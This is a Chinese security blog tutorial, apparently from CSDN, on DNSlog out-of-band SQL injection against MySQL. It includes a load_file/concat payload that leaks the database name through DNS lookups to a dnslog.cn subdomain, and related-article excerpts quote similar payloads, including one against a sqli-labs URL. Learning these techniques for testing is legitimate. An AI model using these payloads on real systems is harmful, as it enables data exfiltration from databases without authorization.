DNSlog注入 信息的 带外|外带 sql注入利用详解+实操

最新推荐文章于 2024-08-23 04:49:43 发布
最新推荐文章于 2024-08-23 04:49:43 发布
阅读量4k 收藏 10
点赞数 6
分类专栏: web安全 文章标签: mysql 数据库 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48083470/article/details/119379081
版权

DNSlog注入

DNSlog注入原理

dnslog注入也可以称之为dns带外查询,是一种注入姿势,可以通过查询相应的dns解析记录,来获取我们想要的数据

一般情况下,在我们无法通过联合查询直接获取数据的情况下,我们只能通过盲注,来一步步的获取数据,但是,使用盲注,手工测试是需要花费大量的时间的,可能会想到使用sqlmap直接去跑出数据,但在实际测试中,使用sqlmap跑盲注,有很大的几率,网站把ip给封掉,这就影响了我们的测试进度

首先说明,dns带外查询属于MySQL注入,在MySQL中有个系统属性
secure_file_priv特性,有三种状态
secure_file_priv为null 表示不允许导入导出
secure_file_priv指定文件夹时,表示mysql的导入导出只能发生在指定的文件夹
secure_file_priv没有设置时,则表示没有任何限制
可了解一下load_file和outfile

show variables like ‘%secure%’;查看load_file()可以读取的磁盘。

有路径或为null 的 则不可以进行 DNSlog 外带
在这里插入图片描述
为空的则可以
在这里插入图片描述
在 my.ini 可以设置
在这里插入图片描述
设置完要重启一下mysql服务 任务管理器中 重启服务
在这里插入图片描述

DNSlog注入工具

工具
http://www.dnslog.cn

http://ceye.io
这里用 http://www.dnslog.cn 来演示
在这里插入图片描述
首先看看怎么用 效果
复制到网址处 前面加点信息 查询
在这里插入图片描述
在这里插入图片描述
我们可以看到 刚刚查询该域名的信息就被记录下来了
在这里插入图片描述

SQL注入利用

当前查询信息
在这里插入图片描述
UNC路径

什么是UNC路径?

UNC路径就是类似\softer这样的形式的网络路径。它符合 \servername\sharename 格式,其中 servername 是服务器名,sharename 是共享资源的名称。

目录或文件的 UNC 名称可以包括共享名称下的目录路径,格式为:\servername\sharename\directory\filename。

例如把自己电脑的文件共享,你会获得如下路径,这就是UNC路径

那我们这就是通过这种方式来带出信息
load_file() 里面我们构造UNC路径

1、四个 \ 其中为转义 代表两个 \
2、后面跟上我们要的信息
3、跟上我们的域名
4、最后还有个文件名,可以随意写 如下面的 123

那么mysql 就会去访问这个路径 去找这个路径下的文件123

也就会访问我们的地址 那么就会向上DNS解析 服务器就会记录下这次解析

我们再查DNSlog 日志 他的记录 ,然后我们就带出了信息

select load_file(concat('\\\\',(select database()),'.qqjoy9.dnslog.cn\\123'));

在这里插入图片描述
我们要的信息就带出来了
在这里插入图片描述
这里要注意的是,如果外带信息有特殊字符
例如 我们要外带这个 里面有个 @ 那么就外带不了
在这里插入图片描述
可以通过hex函数 转为16进制来外带
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
那么之后就是在实际应用中 能select load_file的地方就可以尝试 外带

无限键制
关注
专栏目录
dnslog注入_dnslog盲注
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
09-09 1806
dnslog注入原理通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录此时变为显错注入,将dnslog注入盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接到域名中,访问时将访问服务器,记录后查看日志。dnslog注入主要用于布尔型盲注、时间型盲注、有注入但是无显示,注入线程太大容易被waf拦截等情况。主要原理就是利用load_file这个函数,这个函数的目的是读取本地文件,也可以对外发送请求,利用这个函数,我们再使用concat函数将dnslog
sqlmap + dnslog外带数据:
CYLK1987310466的博客
08-06 1048
sqlmap dnslog外带数据
sql注入——dns带外注入
cxrpty的博客
02-10 3637
以sql labs8为例 1.搜索dns.log在线软件,并get一个域名 2.在cmd中ping该域名,发现解析成功 3.在sql labs8中输入http://localhost/sqli-labs-master/Less-8/?id=1' and load_file("\\\\sss.cipv66.dnslog.cn\\xxx.txt") -- -,并执行 4.在dn...
安全工具】DNSlog工具原理搭建及使用(非常详细)零基础入门到精通,收藏这一篇就够了
Python_paipai的博客
06-28 3300
比如说,我注册了一个为luomiweixiong.com的域名,我将 它的a记录泛解析到139.x.x.x上,这样就实现了无论我记录值填什么他都有解析,并且都指向139.x.x.x,当我向dns服务器发起test.luomiweixiong.com的解析请求时,DNSlog中会记录下他给test.luomiweixiong.com解析,解析值为139.x.x.x.网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
SQL注入 - Part 3(带外
捡破烂日记^ ^
05-23 712
本篇主要是思路概述(sql注入新思路+waf)
DNSlog外带
adaosanqian的博客
02-28 7545
减轻盲注的复杂操作,运用DNSlog外带来进行操作
dnslog外带是什么
来而不往非礼也
05-14 1371
在看hw面经的时候发现了dnslog外带的相关的知识点,有点迷惑,所以写下这篇文章记录,方便日后查阅。
DNS外带
==
03-01 834
DNS_LOG外带 DNSLOG.cn (实际情况中你发现渗透的时候,有布尔型注入,但是很花时间,你有什么别的方法能够加快时间- 解决办法DNS_LOG外带) 普通DNS外带 http://dnslog.cn/ select load_file(concat('\\\\',(select database()),'.tqfkcu.dnslog.cn/abc')) 通过16进制编码DNS外带 select load_file(concat('\\\\',(select substr..
mysql dns 注入_数据库DNSLog外带注入-总结
weixin_29279047的博客
01-19 975
sql注入利用的骚姿势你又知道几个?DNSLog外带注入DNSlog带外注入?(OOB)其实是一样的,叫法不同!本人还是习惯叫外带注入,自我感觉,比较顺口为什么需要外带注入?当我们对一个数据库进行注入时,无回显,且无法进行时间注入,那么就可以利用一个通道,把查询到数据通过通道带出去,这里的通道包括:http请求、DNS解析、SMB服务等将数据带出。of course!这里主讲DNSlog外带注...
https防止注入_数据库DNSLog外带注入总结
weixin_39553600的博客
11-20 588
sql注入利用的骚姿势你又知道几个?DNSLog外带注入DNSlog带外注入?(OOB)其实是一样的,叫法不同!本人还是习惯叫外带注入,自我感觉,比较顺口为什么需要外带注入?当我们对一个数据库进行注入时,无回显,且无法进行时间注入,那么就可以利用一个通道,把查询到数据通过通道带出去,这里的通道包括:http请求、DNS解析、SMB服务等...
sqlmap结合dnslog外带注入
newlife1441的博客
08-05 638
目录📓前言📓操作步骤1.win11中下载小皮搭建sqli-labs靶场并查看win11数据库中的文件读取配置2.环境准备2.1Windows server2008 2.1.1搭建dns服务器2.2测试2.2.1设置靶机的网络的dns为server20082.2.2在win11靶机ping一下server2008中创建的域名并打开kali查看 2.2.3server2008中创建转发器2.2.4测试转发器的域名是否可以ping通并查看kali中接收情况2.3开始sqlmap使用dnslog外带注入2.3...
一篇学会SQL注入 | 详解SQL注入(基础向,基础到每个参数)
weixin_47075747的博客
06-14 1174
**括号里面的查询被称之为子查询,在执行顺序中子查询先执行,然后再执行外面的 select **2) 的值是确定性的,假随机。
84.网络安全渗透测试—[SQL注入篇23]—[高级注入技巧-dnslog无回显注入]
qwsn
01-21 4356
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、高级注入技巧 dnslog无回显注入 1、原理 2、dnslog平台 3、MySQL dnslog无回显注入示例: 4、SQLSERVER dnslog无回显注入示例: 5、总结:
DNSlog外带数据注入
C_LCH_2000的博客
08-04 1468
盲注代替 DNS logDNS日志,域名解析的记录。
写bat脚本双击执行
qq_35911118的博客
04-08 2920
@echo off           不显示后续命令行及当前命令行 dir c:*.* >a.txt       将c盘文件列表写入a.txt call c:\ucdos\ucdos.bat    调用ucdos echo 你好            显示"你好" pause              暂停,等待按键继续 rem 准备运行wps         注释:准备运行wps cd ucdos            进入ucdos目录 wps               运行wps @echo
sql注入利用dnslog外带数据快速注入
weixin_56023251的博客
08-08 2039
sql注入时为布尔盲注、时间盲注,注入的效率低且线程高容易被waf拦截,又或者是目标站点没有回显,我们在读取文件、执行命令注入等操作时无法明显的确认是否利用成功,这时候就要用到我们的DNSlog注入Dns在域名解析时会留下域名和解析ip的记录,利用这点我们可以使用Dnslog(日志)记录显示我们的注入结果。mysql读入文件时 首先需要将secure_file_priv的默认值为null ,只需要在my.ini修改secure_file_priv=''2.开启了LOAD_FILE() 读取文件的函数。.
dns带外查询(cloudeye.me的使用)
热门推荐
一个码农的笔记
11-23 1万+
一些操蛋盲注可以用dns带外查询来解决了,而且有了cloudeye这个神器就可以愉快的解决: 说明: 我们在浏览网页或者ping某个域名的时候我们先是从域名服务器里面获取那个网站的ip地址,然后我们才会发起对那台服务的请求,cloudeye留下了四级五级域名的控制权,所以我们能发起一个域名请求来在cloudeye留下日志信息,从将数据库信息带出来 比如:ping test.xxx
创新蓝队-针对DNSlog数据外带攻击的应急与预防
Liyu_6618的博客
02-01 2308
创新蓝队-针对DNSlog数据外带攻击的应急与预防
【技巧】DNSlog外带文件
最新发布
qinjilll的博客
08-23 1108
我们都知道DNS就是将域名解析为ip,用户在浏览器上输入一个域名A.com,就要靠DNS服务器将A.com解析到它的真实ip127.0.0.1,这样就可以访问127.0.0.1服务器上的相应服务。那么DNSlog是什么。DNSlog就是存储在DNS服务器上的域名信息,它记录着用户对域名等的访问信息,类似日志文件。我们在读取文件、执行命令注入等操作时无法明显的确认是否利用成功。
sql注入外带dnslog
09-11
很抱歉,我不能提供关于SQL注入外带DNS log的任何信息SQL注入是一种安全漏洞,允许攻击者通过在应用程序中插入恶意SQL代码来获取未经授权的访问权限或者对数据库进行操纵。这是一种严重的漏洞,应该被尽快修复。如果你担心你的应用程序存在SQL注入漏洞,请立即与相关安全团队或专业人员联系以修复该问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值